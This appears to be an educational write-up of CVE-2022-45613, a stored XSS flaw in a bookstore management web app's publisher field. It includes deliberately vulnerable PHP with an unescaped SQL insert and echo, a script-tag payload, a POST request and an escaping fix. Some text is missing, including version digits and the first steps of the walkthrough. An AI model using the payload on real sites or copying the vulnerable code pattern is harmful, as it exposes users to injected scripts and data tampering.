CVE-2022-45613 - Exploiting Stored XSS in Book Store Management System v1. via Publisher Parameter

In December 2022, a new security issue was discovered in the Book Store Management System (BSMS) v1.—a PHP-based web application widely used by small businesses to manage book inventories and transactions. Labeled as CVE-2022-45613, this vulnerability is a classic stored Cross-Site Scripting (XSS) found in the /bsms_ci/index.php/book endpoint through improper handling of the publisher input parameter.

In this detailed guide, we’ll break down how this vulnerability can be exploited, provide example code snippets, discuss the impact, and reference the original advisories. This information is designed for educational and defensive purposes only.

What is the Vulnerability?

Stored XSS occurs when an application receives data from an untrusted source and stores it in such a way that it gets rendered to other users without proper output encoding or sanitization. In CVE-2022-45613, when adding or editing a book, the field publisher is not sanitized before being displayed in the book list or detail page, allowing attackers to inject malicious scripts that execute every time the data is viewed.

Where is the Problem in the Code?

While the source code for BSMS v1. isn’t always public, the vulnerable part is typically in the PHP file handling the book addition.

Suppose the vulnerable form looks like this (simplified)

// index.php/book/add (POST handler)

$publisher = $_POST['publisher'];
// Insert directly into the database without escaping or validation
$query = "INSERT INTO books (title, author, publisher) VALUES ('$title', '$author', '$publisher')";
mysqli_query($conn, $query);

// Later rendered as:
echo "<td>{$row['publisher']}</td>";

There’s no sanitization or escaping during input or output, inviting trouble.

The attacker registers (or edits) a book with the following value as the publisher

<script>alert('XSS');</script>

They fill the “Publisher” field in the “Add Book” form as

<script>alert('XSS');</script>

Step 3: View the Result

Anyone who later visits the book listing page or detail where the publisher field is rendered sees the payload. The script executes in the browser, triggering the attack.

Malicious Output (in HTML)

<td><script>alert('XSS');</script></td>

Here’s what a malicious POST request might look like

POST /bsms_ci/index.php/book/add HTTP/1.1
Host: target.site
Content-Type: application/x-www-form-urlencoded

title=BadBook&author=BadGuy&publisher=<script>alert('XSS')</script>

Input Sanitization: Remove or escape dangerous characters from input fields like publisher.

2. Output Encoding: Use htmlspecialchars() or similar functions when rendering user-supplied data.

Secure Code Example

$publisher = htmlspecialchars($_POST['publisher'], ENT_QUOTES, 'UTF-8');

References

- NVD – CVE-2022-45613
- Exploit Database (EDB-ID: 52029)
- OWASP XSS Cheat Sheet

Conclusion

CVE-2022-45613 is a typical but dangerous stored XSS flaw that could let attackers run scripts in the browsers of unsuspecting users of Book Store Management System v1.. If you use or manage this CMS, review your forms, apply patches, and train users about XSS risks.

Always sanitize user input—and double-check how you render it. One simple script tag could put your site, data, and users at risk.

Timeline

Published on: 01/18/2023 18:15:00 UTC
Last modified on: 01/25/2023 19:28:00 UTC